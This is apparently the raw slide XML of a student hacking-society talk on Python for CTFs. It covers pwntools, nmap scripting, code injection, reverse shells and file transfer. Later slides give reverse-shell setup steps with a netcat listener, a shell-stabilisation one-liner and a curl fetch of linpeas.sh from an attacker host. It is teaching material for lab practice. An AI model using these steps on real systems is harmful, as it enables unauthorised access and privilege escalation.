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IBM Plex Sans"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Alice"/>
      <p:regular r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins SemiBold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IBMPlexSans-bold.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-regular.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsSemiBold-regular.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Alice-regular.fntdata"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsSemiBold-italic.fntdata"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsSemiBold-bold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5.gif>
</file>

<file path=ppt/media/image16.png>
</file>

<file path=ppt/media/image17.png>
</file>

<file path=ppt/media/image18.jpg>
</file>

<file path=ppt/media/image2.png>
</file>

<file path=ppt/media/image4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4a4062657_1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354a4062657_1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25fa8341b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a25fa8341b_1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a25fa8341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3a25fa8341b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a25fa8341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3a25fa8341b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a25fa8341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3a25fa8341b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a25fa8341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3a25fa8341b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a31ce0edc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a31ce0edc4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a31ce0edc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a31ce0edc4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a31ce0edc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3a31ce0edc4_2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a31ce0edc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3a31ce0edc4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a31ce0ed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a31ce0edc4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8634e48be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8634e48be2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a31ce0edc4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3a31ce0edc4_2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a31ce0edc4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3a31ce0edc4_2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a31ce0edc4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3a31ce0edc4_2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54a4062657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354a4062657_8_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54a40626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354a406265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cca1495b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6cca1495bb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4a406265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354a4062657_8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4a4062657_8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354a4062657_8_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54a4062657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54a4062657_8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8634e48be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8634e48be2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6cca1495b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6cca1495bb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a25fa834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a25fa8341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0" name="Google Shape;14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9" name="Google Shape;159;p3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1" name="Google Shape;161;p3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77" name="Google Shape;177;p3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8" name="Google Shape;178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3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hyperlink" Target="https://github.com/pentestmonkey/php-reverse-shel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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.jp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hyperlink" Target="http://linpeas.sh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hyperlink" Target="http://linpeas.sh" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.1:8000/linpeas.sh" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.1:8000/linpeas.sh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01" name="Google Shape;301;p4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2" name="Google Shape;302;p4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3" name="Google Shape;303;p4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04" name="Google Shape;304;p46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Pwntools - A deeper dive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05" name="Google Shape;305;p46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is a library for CTF challenges and exploit development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provides a suite of utilities for tasks like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Interacting with binary executables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Manipulating shellcode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Crafting network packets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Automating exploit scripts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you go to docs.pwntools.com , it explain all of the modules that pwntools has in detail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11" name="Google Shape;311;p4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2" name="Google Shape;312;p4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3" name="Google Shape;313;p4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14" name="Google Shape;314;p47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Python Scripting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15" name="Google Shape;315;p47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 scripting is used to exploit vulnerabilities due to its extensive libraries and modules for network, system, and web interactions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can develop custom tools to attack specific vulnerabilities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 reverse shells for remote command execution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exploitation python scripts are still useful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 can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assist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 maintaining persistence and escalating privileges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21" name="Google Shape;321;p4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2" name="Google Shape;322;p4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3" name="Google Shape;323;p4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24" name="Google Shape;324;p48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Python Scripting - Nmap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25" name="Google Shape;325;p48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By using nmap with python you can automate the scanning of open ports, hosts, and vulnerabilities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Firstly you need to install the python-nmap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library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ip install python-nmap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Now you can use this to run an nmap scan in a python script - starting by importing nmap into the script in the same way you’d import random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can then create a script that completes a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basic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or advanced nmap scan of a network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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="57329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31" name="Google Shape;331;p49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49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p49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34" name="Google Shape;334;p49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Python Scripting - Nmap</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Google Shape;335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425" y="1738100"/>
            <a:ext cx="4473574" cy="257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1562893"/>
            <a:ext cx="4400475" cy="2929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42" name="Google Shape;342;p50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3" name="Google Shape;343;p50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4" name="Google Shape;344;p50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45" name="Google Shape;345;p50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Code Injection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46" name="Google Shape;346;p50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a common vulnerabilities in code such as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user-controlled inputs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■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SQL Injection, Cross-Site Scripting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insecure use of eval()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■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Enter command lines to traverse/manipulate directories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input validation and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sanitization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■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Enter a path to read sensitive data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Insecure deserialisation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■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Attackers can create a serialized object that when deserialized runs code like reverse shelling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1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52" name="Google Shape;352;p5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3" name="Google Shape;353;p5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4" name="Google Shape;354;p5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55" name="Google Shape;355;p51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Reverse Shelling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56" name="Google Shape;356;p51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Rev-shell is when you take advantage of a system’s vulnerabilities to initiate a shell session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allows attackers to open ports to the target machines, forcing communication, and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enables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 complete take over of the machine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2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62" name="Google Shape;362;p5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3" name="Google Shape;363;p5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4" name="Google Shape;364;p5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65" name="Google Shape;365;p52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Reverse Shelling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66" name="Google Shape;366;p52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7" name="Google Shape;367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71988" y="1710000"/>
            <a:ext cx="5400024" cy="26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3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73" name="Google Shape;373;p5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4" name="Google Shape;374;p5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5" name="Google Shape;375;p5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76" name="Google Shape;376;p53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Reverse Shelling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77" name="Google Shape;377;p53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8" name="Google Shape;378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91013" y="1654750"/>
            <a:ext cx="5436324" cy="272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4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84" name="Google Shape;384;p5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5" name="Google Shape;385;p5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6" name="Google Shape;386;p5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87" name="Google Shape;387;p54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How to Rev-Shell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88" name="Google Shape;388;p54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can use a .php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script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file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similar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like .php3, .php4, .php5, .phtml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 can access the script on github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https://github.com/pentestmonkey/php-reverse-shell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Change the ip address to yours, and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pick the port you are going to use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Set up NetCat listener on the same port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 the executable php file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Now you have access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5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394" name="Google Shape;394;p5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5" name="Google Shape;395;p5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6" name="Google Shape;396;p5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397" name="Google Shape;397;p55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Stabilize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the Shell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398" name="Google Shape;398;p55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Next you need to try and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stabilize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the shell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Stabilization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script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python3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-c ‘import pty;pty.spawn(“/bin/bash”)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8288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■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 3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doesn’t work, try python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Press ctrl + z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tty raw -echo; fg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Export TERM=xterm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stabilizing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you can do thing like ctrl + c and it doesnt stop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active shell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09" name="Google Shape;209;p38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10" name="Google Shape;210;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1098200" y="790875"/>
            <a:ext cx="7101900" cy="3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Route</a:t>
            </a:r>
            <a:endParaRPr sz="24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150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0013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7872" y="1619247"/>
            <a:ext cx="2133315" cy="190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p38"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="212" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2607213" y="2571750"/>
            <a:ext cx="982800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/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38"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="212" idx="3"/>
            <a:endCxn id="213" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5495013" y="2571750"/>
            <a:ext cx="982800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="1143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6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04" name="Google Shape;404;p56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5" name="Google Shape;405;p56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06" name="Google Shape;406;p56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07" name="Google Shape;407;p56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Transfer of Files (hosting)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08" name="Google Shape;408;p56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transfer files between machines using python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(lovely stuff)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do this by using a python web server, consider this: </a:t>
            </a:r>
            <a:b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Attacking Machine (Us): </a:t>
            </a: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192.168.1.1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current directory we have </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" u="sng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linpeas.sh</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="B6D7A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ython </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="200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-m</a:t>
            </a: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http.server </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB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8000</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="20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7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14" name="Google Shape;414;p57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5" name="Google Shape;415;p57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6" name="Google Shape;416;p57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17" name="Google Shape;417;p57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Transfer of Files (taking file)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18" name="Google Shape;418;p57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transfer files between machines using python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(lovely stuff)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do this by using a python web server, consider this: </a:t>
            </a:r>
            <a:b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Attacking Machine (Us): </a:t>
            </a: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192.168.1.1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current directory we have </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB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linpeas.sh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curl </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="200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-O</a:t>
            </a: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GB" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="EA9999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http://192.168.1.1:8000/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4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linpeas.sh</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="A4C2F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A4C2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8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24" name="Google Shape;424;p58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5" name="Google Shape;425;p58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6" name="Google Shape;426;p58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427" name="Google Shape;427;p58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Transfer of Files (requirements)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428" name="Google Shape;428;p58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Victim machine must have python installed and enabled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this doesn’t work enjoy using nc or scp :0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Devices must be on the same network (to talk to one another)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A4C2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34" name="Google Shape;434;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4100266" y="3827288"/>
            <a:ext cx="943468" cy="1099720"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2199439" w="1886935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1886936" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886936" y="2199438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2199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5" name="Google Shape;435;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1441101" y="1052998"/>
            <a:ext cx="6261798" cy="2584415"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="5168830" w="12523597">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12523596" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12523596" y="5168830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5168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6" name="Google Shape;436;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3256501" y="155125"/>
            <a:ext cx="263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Practical</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Google Shape;437;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1441050" y="1991213"/>
            <a:ext cx="6261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https://tryhackme.com/room/pyrat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0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443" name="Google Shape;443;p60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4" name="Google Shape;444;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="1666950"/>
            <a:ext cx="3048000" cy="19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Pub?</a:t>
            </a:r>
            <a:endParaRPr sz="10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21" name="Google Shape;221;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742448" y="490538"/>
            <a:ext cx="1115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22" name="Google Shape;222;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1098200" y="790875"/>
            <a:ext cx="7101900" cy="3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</a:rPr>
              <a:t>Announcements</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="29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Membership cards</a:t>
            </a:r>
            <a:endParaRPr b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Q-zips</a:t>
            </a:r>
            <a:endParaRPr b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-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enhancement week talks</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-3492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-GB" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="F4CCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Peter Clarke, BT Red Team Tuesday 18th November 13:00 – 15:00 Gateway House GH5.39</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="F4CCCC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-3492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-GB" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allan Cook (Accenture) &amp; Jamie Roderick (LRQA) Breaking the Bad News – Communicating Cybersecurity Incidents with Confidence and Care Gateway House 19th November GH5.39 10:00 – 12:30</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-3492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-GB" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="D9EAD3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Airbus Day 20th November 10:00 – 15:30 Gateway House GH5.39</a:t>
            </a:r>
            <a:endParaRPr b="1"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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6096000"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0"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28" name="Google Shape;228;p40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-220774" y="1887607"/>
            <a:ext cx="9585548" cy="3255895"/>
            <a:chOff x="0" y="-38100"/>
            <a:chExt cx="5049177" cy="1715039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="229" name="Google Shape;229;p40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5049177" cy="1676939"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1676939" w="5049177">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5049177" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5049177" y="1676939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1676939"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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30" name="Google Shape;230;p40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-38100"/>
              <a:ext cx="5049177" cy="17150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" name="Google Shape;231;p40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="508472" y="2965908"/>
            <a:ext cx="8115300" cy="1701570"/>
            <a:chOff x="0" y="-38100"/>
            <a:chExt cx="4274726" cy="896301"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="232" name="Google Shape;232;p40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FFFFF">
                  <a:alpha val="6000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0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4" name="Google Shape;234;p40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="514350" y="2965908"/>
            <a:ext cx="8115300" cy="1701570"/>
            <a:chOff x="0" y="-38100"/>
            <a:chExt cx="4274726" cy="896301"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="235" name="Google Shape;235;p40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="4274726" cy="858201"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8582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829581"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4274726" y="845387"/>
                    <a:pt x="4261912" y="858201"/>
                    <a:pt x="4246106" y="858201"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28620" y="858201"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12813" y="858201"/>
                    <a:pt x="0" y="845387"/>
                    <a:pt x="0" y="829581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FFFFFF">
                <a:alpha val="15294"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cap="rnd" cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="15294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0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-38100"/>
              <a:ext cx="4274726" cy="8963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7" name="Google Shape;237;p40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6847428" y="-119834"/>
            <a:ext cx="2176738" cy="2416406"/>
            <a:chOff x="0" y="-38100"/>
            <a:chExt cx="1146594" cy="1272839"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="238" name="Google Shape;238;p40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1146594" cy="1234739"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1234739" w="1146594">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1146594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146594" y="1234739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1234739"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="08172A">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="08172A">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="09182B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39" name="Google Shape;239;p40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-38100"/>
              <a:ext cx="1146594" cy="1272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0" name="Google Shape;240;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7463587" y="454983"/>
            <a:ext cx="1264423" cy="1473830"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2947660" w="2528846">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2528847" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2528847" y="2947660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29476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1" name="Google Shape;241;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="509588"/>
            <a:ext cx="3486006" cy="1100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DMU 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600" u="none" cap="none" strike="noStrike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Hacking Society</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Google Shape;242;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602175" y="3117250"/>
            <a:ext cx="7935000" cy="14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Uses of Python</a:t>
            </a:r>
            <a:endParaRPr sz="48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48" name="Google Shape;248;p41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41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0" name="Google Shape;250;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5477416" y="1838245"/>
            <a:ext cx="1956401" cy="2057400"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4114800" w="3912801">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3912801" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3912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1" name="Google Shape;251;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1710184" y="1838245"/>
            <a:ext cx="2916418" cy="2057400"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4114800" w="5832835">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5832835" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58328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41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53" name="Google Shape;253;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052140" y="712073"/>
            <a:ext cx="703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4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D0nt d0 1ll3gal sh1t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4" name="Google Shape;254;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1710184" y="4180840"/>
            <a:ext cx="572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600" u="none" cap="none" strike="noStrike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please..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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="14169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60" name="Google Shape;260;p42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1" name="Google Shape;261;p42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42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63" name="Google Shape;263;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742450" y="1576550"/>
            <a:ext cx="76899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 is a high-level, object-oriented language. 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It’s syntax is the most similar to English which makes it more readable than other programming languages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has extensive libraries, making tasks easier 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●"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It’s main downside is that it has slower execution speeds to other languages like C++ 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2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is Python?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70" name="Google Shape;270;p43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1" name="Google Shape;271;p43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2" name="Google Shape;272;p43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73" name="Google Shape;273;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650175" y="1428900"/>
            <a:ext cx="38292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Print statements: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9CB9C"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="IBM Plex Sans"/>
                <a:cs typeface="IBM Plex Sans"/>
                <a:sym typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F9CB9C"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="IBM Plex Sans"/>
                <a:cs typeface="IBM Plex Sans"/>
                <a:sym typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>rint(“Hello World!”)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="F9CB9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statements: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i</a:t>
            </a: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f a == “a”:</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFE5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	print(“a”)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFE5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e</a:t>
            </a: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lse:</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFE5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E599"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="IBM Plex Sans"/>
                <a:cs typeface="IBM Plex Sans"/>
                <a:sym typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>	print(a)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFE5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4" name="Google Shape;274;p43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Basic Python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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4997650" y="1428900"/>
            <a:ext cx="38292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 loop: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B6D7A8"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="IBM Plex Sans"/>
                <a:cs typeface="IBM Plex Sans"/>
                <a:sym typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="B6D7A8"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="IBM Plex Sans"/>
                <a:cs typeface="IBM Plex Sans"/>
                <a:sym typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>or i in range(0,5):</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="B6D7A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B6D7A8"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="IBM Plex Sans"/>
                <a:cs typeface="IBM Plex Sans"/>
                <a:sym typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>	print(i + 1)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="B6D7A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While loop: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2C4C9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>while z != “z”:</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="A2C4C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A2C4C9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>	z = “z”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="A2C4C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81" name="Google Shape;281;p44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2" name="Google Shape;282;p44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3" name="Google Shape;283;p44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84" name="Google Shape;284;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
